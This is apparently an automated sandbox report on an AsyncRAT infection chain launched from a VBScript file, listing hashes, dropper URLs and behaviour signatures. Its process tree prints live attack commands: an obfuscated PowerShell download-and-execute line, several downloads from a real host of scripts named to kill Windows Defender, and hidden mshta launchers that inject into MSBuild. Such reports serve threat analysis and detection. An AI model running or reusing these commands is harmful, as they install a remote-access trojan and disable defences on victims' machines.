asyncrat | 767111470dee2831acd1ca1cbfd8e4acb400a71a12422a27922ddf300315f5c7

Analysis

max time kernel
149s
max time network
139s
platform
windows10_x64
resource
win10v20210408
submitted
06-05-2021 04:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NY54.vbs
Size

976B
MD5

8386ad530818e9eb7d3f382539903273
SHA1

5713f51096c411288c065155cbd9b4f197fe7908
SHA256

767111470dee2831acd1ca1cbfd8e4acb400a71a12422a27922ddf300315f5c7
SHA512

dc387f94f678b9c81e00f13421a82cf4c64af612984efb3fd81e08c2f91c7b4079c51d4b81088f2c233344dc8b8d6665b289ae2918a27a3c4f4a901157adec8c

Score

10^/10

asyncrat rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://worf.hosterbox.com/~htgfgdrt/WSA/3.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/NDef/11.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/NDef/Defender.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/NDef/DefenderKill.lnk

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/NDef/Kill.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/ExDef/GoogleUpdate.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/WSA/1.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://worf.hosterbox.com/~htgfgdrt/ExDef/Dicord.lnk

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/2200-257-0x000000000040D09E-mapping.dmp	asyncrat
behavioral2/memory/924-258-0x000000000040D09E-mapping.dmp	asyncrat

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
8	932	powershell.exe
16	932	powershell.exe
18	932	powershell.exe
20	3656	powershell.exe
21	928	powershell.exe
22	2944	powershell.exe
23	228	powershell.exe
24	3632	powershell.exe
25	1356	powershell.exe
26	828	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 3512 set thread context of 2200	3512	powershell.exe	MSBuild.exe
PID 3512 set thread context of 924	3512	powershell.exe	MSBuild.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
932	powershell.exe
932	powershell.exe
932	powershell.exe
216	powershell.exe
216	powershell.exe
216	powershell.exe
3656	powershell.exe
3656	powershell.exe
3656	powershell.exe
928	powershell.exe
928	powershell.exe
928	powershell.exe
2944	powershell.exe
2944	powershell.exe
2944	powershell.exe
228	powershell.exe
228	powershell.exe
228	powershell.exe
1356	powershell.exe
1356	powershell.exe
1356	powershell.exe
2036	powershell.exe
2036	powershell.exe
2036	powershell.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe
1356	powershell.exe
1356	powershell.exe
1356	powershell.exe
828	powershell.exe
828	powershell.exe
828	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedw20.exeMSBuild.exe

description	pid	process
Token: SeDebugPrivilege	932	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeDebugPrivilege	928	powershell.exe
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	228	powershell.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeIncreaseQuotaPrivilege	2036	powershell.exe
Token: SeSecurityPrivilege	2036	powershell.exe
Token: SeTakeOwnershipPrivilege	2036	powershell.exe
Token: SeLoadDriverPrivilege	2036	powershell.exe
Token: SeSystemProfilePrivilege	2036	powershell.exe
Token: SeSystemtimePrivilege	2036	powershell.exe
Token: SeProfSingleProcessPrivilege	2036	powershell.exe
Token: SeIncBasePriorityPrivilege	2036	powershell.exe
Token: SeCreatePagefilePrivilege	2036	powershell.exe
Token: SeBackupPrivilege	2036	powershell.exe
Token: SeRestorePrivilege	2036	powershell.exe
Token: SeShutdownPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeSystemEnvironmentPrivilege	2036	powershell.exe
Token: SeRemoteShutdownPrivilege	2036	powershell.exe
Token: SeUndockPrivilege	2036	powershell.exe
Token: SeManageVolumePrivilege	2036	powershell.exe
Token: 33	2036	powershell.exe
Token: 34	2036	powershell.exe
Token: 35	2036	powershell.exe
Token: 36	2036	powershell.exe
Token: SeIncreaseQuotaPrivilege	2036	powershell.exe
Token: SeSecurityPrivilege	2036	powershell.exe
Token: SeTakeOwnershipPrivilege	2036	powershell.exe
Token: SeLoadDriverPrivilege	2036	powershell.exe
Token: SeSystemProfilePrivilege	2036	powershell.exe
Token: SeSystemtimePrivilege	2036	powershell.exe
Token: SeProfSingleProcessPrivilege	2036	powershell.exe
Token: SeIncBasePriorityPrivilege	2036	powershell.exe
Token: SeCreatePagefilePrivilege	2036	powershell.exe
Token: SeBackupPrivilege	2036	powershell.exe
Token: SeRestorePrivilege	2036	powershell.exe
Token: SeShutdownPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeSystemEnvironmentPrivilege	2036	powershell.exe
Token: SeRemoteShutdownPrivilege	2036	powershell.exe
Token: SeUndockPrivilege	2036	powershell.exe
Token: SeManageVolumePrivilege	2036	powershell.exe
Token: 33	2036	powershell.exe
Token: 34	2036	powershell.exe
Token: 35	2036	powershell.exe
Token: 36	2036	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	828	powershell.exe
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeRestorePrivilege	3024	dw20.exe
Token: SeBackupPrivilege	3024	dw20.exe
Token: SeDebugPrivilege	2200	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exeWScript.exepowershell.exepowershell.execmd.exemshta.execmd.exemshta.exepowershell.execmd.exemshta.exepowershell.exe

description	pid	process	target process
PID 784 wrote to memory of 932	784	WScript.exe	powershell.exe
PID 784 wrote to memory of 932	784	WScript.exe	powershell.exe
PID 932 wrote to memory of 3732	932	powershell.exe	WScript.exe
PID 932 wrote to memory of 3732	932	powershell.exe	WScript.exe
PID 3732 wrote to memory of 216	3732	WScript.exe	powershell.exe
PID 3732 wrote to memory of 216	3732	WScript.exe	powershell.exe
PID 216 wrote to memory of 3656	216	powershell.exe	powershell.exe
PID 216 wrote to memory of 3656	216	powershell.exe	powershell.exe
PID 216 wrote to memory of 928	216	powershell.exe	powershell.exe
PID 216 wrote to memory of 928	216	powershell.exe	powershell.exe
PID 216 wrote to memory of 2944	216	powershell.exe	powershell.exe
PID 216 wrote to memory of 2944	216	powershell.exe	powershell.exe
PID 216 wrote to memory of 228	216	powershell.exe	powershell.exe
PID 216 wrote to memory of 228	216	powershell.exe	powershell.exe
PID 216 wrote to memory of 1356	216	powershell.exe	powershell.exe
PID 216 wrote to memory of 1356	216	powershell.exe	powershell.exe
PID 1356 wrote to memory of 2264	1356	powershell.exe	cmd.exe
PID 1356 wrote to memory of 2264	1356	powershell.exe	cmd.exe
PID 2264 wrote to memory of 3080	2264	cmd.exe	mshta.exe
PID 2264 wrote to memory of 3080	2264	cmd.exe	mshta.exe
PID 3080 wrote to memory of 2036	3080	mshta.exe	powershell.exe
PID 3080 wrote to memory of 2036	3080	mshta.exe	powershell.exe
PID 932 wrote to memory of 3632	932	powershell.exe	powershell.exe
PID 932 wrote to memory of 3632	932	powershell.exe	powershell.exe
PID 932 wrote to memory of 1356	932	powershell.exe	powershell.exe
PID 932 wrote to memory of 1356	932	powershell.exe	powershell.exe
PID 932 wrote to memory of 828	932	powershell.exe	powershell.exe
PID 932 wrote to memory of 828	932	powershell.exe	powershell.exe
PID 932 wrote to memory of 2304	932	powershell.exe	cmd.exe
PID 932 wrote to memory of 2304	932	powershell.exe	cmd.exe
PID 2304 wrote to memory of 3872	2304	cmd.exe	mshta.exe
PID 2304 wrote to memory of 3872	2304	cmd.exe	mshta.exe
PID 3872 wrote to memory of 3512	3872	mshta.exe	powershell.exe
PID 3872 wrote to memory of 3512	3872	mshta.exe	powershell.exe
PID 3512 wrote to memory of 524	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 524	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 524	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 2300	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 2300	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 2300	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 2176	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 2176	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 2176	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 3620	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 3620	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 3620	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 652	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 652	3512	powershell.exe	MSBuild.exe
PID 3512 wrote to memory of 652	3512	powershell.exe	MSBuild.exe
PID 932 wrote to memory of 1020	932	powershell.exe	cmd.exe
PID 932 wrote to memory of 1020	932	powershell.exe	cmd.exe
PID 1020 wrote to memory of 1752	1020	cmd.exe	mshta.exe
PID 1020 wrote to memory of 1752	1020	cmd.exe	mshta.exe
PID 1752 wrote to memory of 1352	1752	mshta.exe	powershell.exe
PID 1752 wrote to memory of 1352	1752	mshta.exe	powershell.exe
PID 1352 wrote to memory of 876	1352	powershell.exe	MSBuild.exe
PID 1352 wrote to memory of 876	1352	powershell.exe	MSBuild.exe
PID 1352 wrote to memory of 876	1352	powershell.exe	MSBuild.exe
PID 1352 wrote to memory of 204	1352	powershell.exe	MSBuild.exe
PID 1352 wrote to memory of 204	1352	powershell.exe	MSBuild.exe
PID 1352 wrote to memory of 204	1352	powershell.exe	MSBuild.exe
PID 1352 wrote to memory of 1380	1352	powershell.exe	MSBuild.exe
PID 1352 wrote to memory of 1380	1352	powershell.exe	MSBuild.exe
PID 1352 wrote to memory of 1380	1352	powershell.exe	MSBuild.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NY54.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`E`X((n`e`W`-Obj`E`c`T(('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).INVOKE((('https://worf.hosterbox.com/~htgfgdrt/WSA/3.txt'))))
2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:932

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\ss.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:3732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/NDef/11.ps1', 'C:\Users\Public\11.ps1') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/NDef/Defender.bat', 'C:\Users\Public\Defender.bat') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/NDef/DefenderKill.lnk', 'C:\Users\Public\DefenderKill.lnk') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/NDef/Kill.ps1', 'C:\Users\Public\Kill.ps1') }"
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\Kill.ps1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Defender.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:2264

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\11.ps1'"", 0:close")
7⤵
- Suspicious use of WriteProcessMemory
PID:3080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\11.ps1'
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/WSA/1.txt', 'C:\Users\Public\msi.ps1') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://worf.hosterbox.com/~htgfgdrt/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\GoogleUpdate.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2304

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(StrReverse(""llehS.tpircSW"")).Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'"", 0:close")
4⤵
- Suspicious use of WriteProcessMemory
PID:3872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3512

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:2300

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:2176

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:3620

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:652

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
6⤵
PID:924

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 692
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\GoogleUpdate.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(StrReverse(""llehS.tpircSW"")).Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'"", 0:close")
4⤵
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:1380

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:780

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
6⤵
PID:828

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft Arts\Start\Dicord.lnk
MD5
ce592d7b323596c62e25c58305fbd1f1

SHA1
a582b2c867d054bfc436ac04aa8b626a6e7c886b

SHA256
8cf9b48967283e8d15012c6f9438280841bb94baf499a91647922f28eab37619

SHA512
0b5640a2261fbb5bcdb60dee6b6178b2c451cce411d8b8791c8d6dc09e1b01a0e80d605a6e4e119453f349e4ee62340e9a3bed70dadb16a8b2fd4592facd3335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
0b840cce7c9020e5daf6949afae53fda

SHA1
36e1b7a8f1fa85cf523ef64fb9f39d5b457f6f5b

SHA256
7948679312a3341b6cb33f6bce6fe5d58733e207a76ad702691451e57d9b7df7

SHA512
e681802304a0762483f8aad1bbbea8ef8a5828786b756f4a99de743d6f00f7e9606d469e399a1bca709155be6fabd6ea4cac655e4ef9cd3ee44bb5b44f9e332d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
43e5fea6124c1f1e490121b7afb0e092

SHA1
34124cb7cefcec729e84b901a3ab45c5166edd45

SHA256
8321c019ea37c641e2a517fcf424f871cd307c58bb92f3ef1024a8c619da89ea

SHA512
308b7f7aee6cf22e02a5e74f4cf6c9f9939552b875d2b496782a47a1b94386d4488094c46b1876f67505006fec3b1fbb9a3196009e7a08972fe2fdd0ec7cd41e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4610095cf7f65e8cc0ab018b18cd5677

SHA1
e2909074b2e1552f5a22a2a96727c86b1332fcb5

SHA256
4af697a87b90fec87b2324285e0c694dd801ab2fef3ec7bce67943d05b8dd55b

SHA512
3bb983b91a219f2ae3cddaf5277e682ad5c0077ad6d889d207819e36375e6f1b430e838781135d20c73384e41f11da863da7838e270de94b6d8b2eb01c5c4d23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
625b09eebf09db57180a573874da7728

SHA1
542a0e75f3ab6748bd7fb96b3a5a5e815bd5a72e

SHA256
f9da6e48d694439d5ee994f3c8a9fcdca443ac422b669c5f63b0c07f55161802

SHA512
1f4cf82928414679b84d455330d3297f590bba465d9715bdd503215e27e252fea5338dbbe40a54a7c350c592a57a5e626d5614efa5bd10c2a7e3bd76e7cb26b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6fcb85c42e25242d956c0719ab1bb5d0

SHA1
5c3610baf01980f9f1dfa33fca487e34c1096d7b

SHA256
a5041e83f774722f2cafb21c9741703c3b7565421611468bbfc70a9c3068b91a

SHA512
562918ef242b7bdebe2f1d6fb93997f18f87b8d94a4d639391d7b944018771e9a551d2519b599f0444da6323bdc99cad0f1ebf5652972d7a8ab4e5e22b488793

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
6fcb85c42e25242d956c0719ab1bb5d0

SHA1
5c3610baf01980f9f1dfa33fca487e34c1096d7b

SHA256
a5041e83f774722f2cafb21c9741703c3b7565421611468bbfc70a9c3068b91a

SHA512
562918ef242b7bdebe2f1d6fb93997f18f87b8d94a4d639391d7b944018771e9a551d2519b599f0444da6323bdc99cad0f1ebf5652972d7a8ab4e5e22b488793

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
3779b3f6ff1596af8219d559a2d3c0fc

SHA1
2c623ffcf59e0ecd543042007f0111609f9eb6d1

SHA256
94e13f5e6ea2757b7157bd23a360413f721cb0e7282c30c36c297783679713f9

SHA512
afca82d4ff2ecc8b121d1dd02528a67264b9f7e3a7b09c55eeb99704eaa9cfbe0f4a3b2ac4d3c31a682e516c1a1551b13a6fda837f807e3d27066df0c673891f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d7c0975f46590844eb262e3b43479088

SHA1
e81dd4cb399f33e4a0476994eabef085a8a8900d

SHA256
2775c46b2f9285d18a79a452cb4e56414ada033f893cc679c5a3eb2a42c86d9c

SHA512
c19d86b6f47d0724120443b0a10c7c7124650115cdfced7e656c6977873aab7c32fc0a25e63f8cc97006a0e819a2ce961acc8aec8e874b8bdbcec7ba6e1587c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c908a213fac9638945f3a548c119a5de

SHA1
314534813a7fdf5aaa9edf3eefe717ce9bc17cb1

SHA256
3d350d71fe7eaab0e9d6f65a7e78f4ad3d4bf917bb18b418b75fc29071265991

SHA512
be9e5465ccac79e6f02b9b9e5284fcbf67be1d8ec9c4be13aa362c2cb9572a55d68d1fc8dec409ea0c87eaf97c1c36b253f45d19403734c1dddd4f22d1e80313

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5b83919d3206bf0e22d4204f32100cbb

SHA1
9d36ea65684e4aa30c773b2daa20e5a02ddca21f

SHA256
54e3cadedcbc689b53a83ae7f934f7eb983dbe56f7b2f53b40b13874807828ac

SHA512
95e6376b6ce4882ceeed85c8af5d8c48946e1b2f7ffb2401cafe6dbe2a721c61d2fef66aaa51efbeaceb5491217d2af4c0645ac7e89550239cc45c9dceb3dc43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1bd0bfce35a8229a821d6b37009073f3

SHA1
0d143cc3786793c0a03b857a366bb77f114df75d

SHA256
6a130794505d63af4f8d75c71b24954e5de48eaf393208d8f62519a31bdd020a

SHA512
0b6781cf8805fa5821ff29c69832470570d25586b3384cb828dd8b8a73150ccdeb41530165659b672b42a1996c2f86f9bec702e1e716dc23fdb6092d9e8326e4

Download Submit
C:\Users\Public\11.ps1
MD5
c2ff4484e0398aba605cd1e1b89de56a

SHA1
db4eae0aa556412afe55cc62aca6a15fc0c85e07

SHA256
d216cbc98c747a0f8d66197d3094c544bbb8e33fe5f4c0962dd7baf2af7c1604

SHA512
08ab0be1107ba3ae3c88d57cb1dce8956874d84301ddfb05576677aba1d7ff3c696503a63239f68e36ee2a651b4e0a50dbdf147fc433e894dde861ba5263475a

Download Submit
C:\Users\Public\11.ps1
MD5
f9671f50a3701099915249be9c9b519e

SHA1
c383a79653700507edf01c494f2a7ac664963711

SHA256
987b88896b23da2d57371bf1709019bee218ee72fb9a88f9afda88427570c448

SHA512
d21f67cee9d3fe56541beaab90c28335f9122abb1942a209ba6634f5f14fa75f8d43a3e0c4a11d2009a964200d06836df8245264c0922b8c46adff68d2293a41

Download Submit
C:\Users\Public\Defender.bat
MD5
bb81dd50c01d78e9359b7d8f2b99f93e

SHA1
35ecd940870508d659866d43351ebd11920b98b8

SHA256
fa94673156394c814fdab9b634ad6e327cc7e0f6cf5412f31d74103a3a6e3931

SHA512
3c29815e29a65e14f0202ddd9c83eda367535651f87332be39acfe2d0c51536cc224281b7c794f1b67a3528c293fdf76a7142b5d1c1c734ab35c664fa657f90f

Download Submit
C:\Users\Public\DefenderKill.lnk
MD5
d50605593740da71810d0dedf04281e0

SHA1
b672961b731400d653039fedcd7dfa71cc3e0179

SHA256
56ec901d7efadda7a2868abc7ff458d8177660361e5572a4806a232e46846464

SHA512
